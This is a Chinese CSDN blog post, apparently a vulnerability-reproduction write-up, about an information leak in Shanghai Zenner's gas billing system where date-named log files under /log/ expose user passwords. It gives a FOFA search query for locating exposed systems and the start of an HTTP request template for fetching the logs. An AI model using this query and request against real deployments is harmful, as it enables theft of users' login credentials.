【漏洞复现】上海真兰燃气收费系统信息泄露漏洞

最新推荐文章于 2024-10-10 14:15:00 发布
最新推荐文章于 2024-10-10 14:15:00 发布
阅读量403 收藏 6
点赞数 7
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/135699330
版权
【漏洞复现】 专栏收录该内容
150 篇文章 1 订阅

已下架不支持订阅

本文介绍了上海真兰燃气收费系统存在的信息泄露漏洞,详细描述了漏洞情况,包括攻击者如何通过遍历log目录下的日志文件获取用户登录密码等敏感信息。此外,还提供了产品的主页查询方式及修复建议,建议联系软件厂商解决此问题。
摘要由CSDN通过智能技术生成

Nx01 产品简介

        上海真兰仪表科技股份有限公司,成立于2011年,真诺测量仪表成员,位于上海市,是一家以从事仪器仪表制造业为主的企业。

Nx02 漏洞描述

        上海真兰仪表科技股份有限公司燃气收费系统存在信息泄露漏洞,log目录下记录日志信息使用log+年月日的格式来记录,攻击者通过遍历日志信息获取用户登陆密码等信息。

Nx03 产品主页

fofa-query: app="上海真兰燃气收费系统"

Nx04 漏洞复现

log路径下遍历年月日进行获取敏感信息。

POST /log/log20210820.txt HTTP/1.1
Host: {
  {Hostname}}
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
专栏目录

已下架不支持订阅

漏洞复现上海真兰燃气收费系统SQL注入漏洞
晚风不及你
01-19 782
上海真兰仪表科技股份有限公司,成立于2011年,真诺测量仪表成员,位于上海市,是一家以从事仪器仪表制造业为主的企业。
真兰仪表通过深交所注册:拟募资17.4亿 上半年净利下降27%
leijianping_ce的博客
12-13 170
雷递网 雷建平 12月13日上海真兰仪表科技股份有限公司(简称:“真兰仪表”)日前通过注册,准备在深交所创业板上市。真兰仪表计划募资17.4亿元。其中,7.76亿用于真兰仪表科技有限公司燃气表产能扩建项目,6.12亿元用于上海真兰仪表科技股份有限公司基地建设项目;3.5亿元用于补充流动资金。上半年净利下降27%真兰仪表主营业务为燃气计量仪表及配套产品的研发、制造和销售。公司现已形成模具开发与生产、...
zenner WR3 真兰多功能能量积分仪 MBUS协议解析
conquerwave的专栏
08-01 1780
一、硬件连接 若要接入485或232需用一个MBUS转换器接入,否则不返回数据 二、协议使用 串口设置 默认2400bps even 8 1 2.1发送 10 7B 00 7B 16 2.2接收(仅部分说明) 68 EF EF 68 08 00 72 32 07 80 44 4D 6A 82 0D 00 00 00 00      04 79|00 00 00
MATLAB 论文复现——共享型虚拟电厂风险调度与电能共享机制
sjr1478的博客
07-29 139
虚拟电厂的建设为需求侧资源管理和利用提供了新思路,同时,电能共享因其能够促进区域电力平衡和提升电力系统灵活性而备受关注。为此,文中对基于虚拟电厂的电能共享交易机制进行了研究。首先,提出了共享型虚拟电厂概念,并建立其与新能源场站的电能共享框架;[1]马雨彤,张春雁,窦真兰,等.共享型虚拟电厂风险调度与电能共享机制[J/OL].电力系统自动化,1-13[2024-07-29].http://kns.cnki.net/kcms/detail/32.1180.TP.20240712.1021.002.html.
上海亚商投顾:沪指放量大涨 券商等权重板块全线飙升
上海亚商投顾的博客
02-20 1102
上海亚商投顾前言:无惧大盘涨跌,解密龙虎榜资金,跟踪一线游资和机构资金动向,识别短期热点和强势个股。 市场情绪 三大指数今日集体反弹,沪指、深成指单边拉升,午后均涨超2%,上证50大涨超2.7%,50只成分股全线上涨。券商、银行、保险等大金融板块飙升,湘财股份涨停,南京证券一度触板,成都银行涨超9%,中金公司、中国太保、中国人寿涨逾5%。机械、大基建板块联袂走强,徐工机械、振华重工、苏博特等封板,建设机械、三一重工、中联重科、中国建筑等纷纷大涨。ChatGPT概念股集体反弹,三六零、神州数码、拓维信息、新华
iES-AMR2000直读式自动抄表系统
曾保权的技术专栏
11-25 2762
   积成电子,是中国直读式自动抄表的技术倡导者、产业化推动者和行业标准制订者。  积成电子率先提出直读抄表概念,目前拥有国内最完整的直读式远传表产品线,参与国家有关行业标准的编制。 经过验证的完整的产品系列:  积成电子自2000年推出第一款直读式远传表以来,已有三十余万只直读式远传表运行在全国各地,是国内直读式远传抄表领域运行时间最长、品种最全、数量最多
迈拓水表接线及修改modbus地址
赵一舟的博客
02-01 1737
查看数据线的端口地址com3
下载个资料还要积分!!!!哎,真头大
weixin_44863729的博客
04-01 508
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
解决webstrom中重命名时出现java.io.IOException: Cannot rename “D:web项目\vue _test\src‘ to‘Src_01‘的问题
qq_49080239的博客
08-02 2920
我之所以会选择暂停node.exe是因为当我关闭了所有正在使用的软件时,我只发现了node.exe竟然还在运行中,所以我尝试着暂停,再次打开webstrom时便可以修改src的名称了。我认为每个人遇到这个错误提示的情况是不一定的,都可以先关闭所有程序(即webstrom、谷歌等),打开资源监视器找到与自己编写代码相关的进程然后关闭或暂停应该就可以解决了。第一步:任务管理器----》性能----》CPU----》打开资源监视器。情况一:由于终端的进程还未关闭,可以连续两次Ctrl+c即可解决。...
德国真兰空调计费系统解决方案.doc
07-08
德国真兰空调计费系统解决方案是基于德国 Zenner 公司的产品和技术,结合上海至信实业有限公司的销售和服务网络,提供了一整套中央空调(集中供能)分户计量系统解决方案。该解决方案涵盖了热量表系列、水表系列、...
14通往广场的路不止一条(邝真兰).docx
11-09
《通往广场的路不止一条》是一篇充满哲理的课文,收录在人教版小学五年级上册语文教材中,属于第四单元“生活中”的启示篇章。这篇文章讲述了作者小时候随父亲登高看到罗马广场的景象,父亲的一句“通往广场的路不止...
2024年三个月网络安全(黑客技术)入门教程
2401_85027336的博客
09-25 2167
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
《网络安全:数字时代的坚实护盾》
一名资深Java工程师的技术分享
10-10 241
在当今高度数字化的时代,网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全,更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。
web安全】——XXE漏洞
wxh的博客
10-02 1267
XML被称为可扩展标记语言,与HTML类似,但是HTML中的标签都是预定义(预先定义好每个标签的作用)的,而XML语言中的标签都是自定义(可以自己定义标签的名称、属性、值、作用)的;HTML中的标签可以是单标签,而XML中的标签必须是成对出现。
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 1197
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
高效查找服务器漏洞
2401_85592408的博客
10-07 363
11. 使用专业工具:可以使用如OSV-Scanner、Sqlmap、Wapiti、ZAP、CloudSploit、Firmwalker、Nikto2、OpenSCAP等专业工具来检测不同类型的漏洞。3. 服务识别:识别运行在开放端口上的服务及其版本,这可以通过Nmap的版本检测功能或Metasploit的辅助模块来完成。1. 信息收集:首先需要收集目标服务器的相关信息,包括开放的端口、运行的操作系统、应用程序及其版本等。12. 持续监控:安全是一个持续的过程,需要定期重复上述步骤来检测新出现的漏洞
网络安全(黑客)——自学2024
最新发布
2401_84466325的博客
10-10 876
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-10 1825
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
德国真兰空调计费系统解决方案概述
此外,上海至信实业有限公司作为真兰的一级代理商,拥有资深的工程团队,提供中央空调分户计量系统整体解决方案,包括安装调试和售后服务,为上海及华东地区客户带来优质的体验。得益于这些努力,ZENNER产品在上海...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值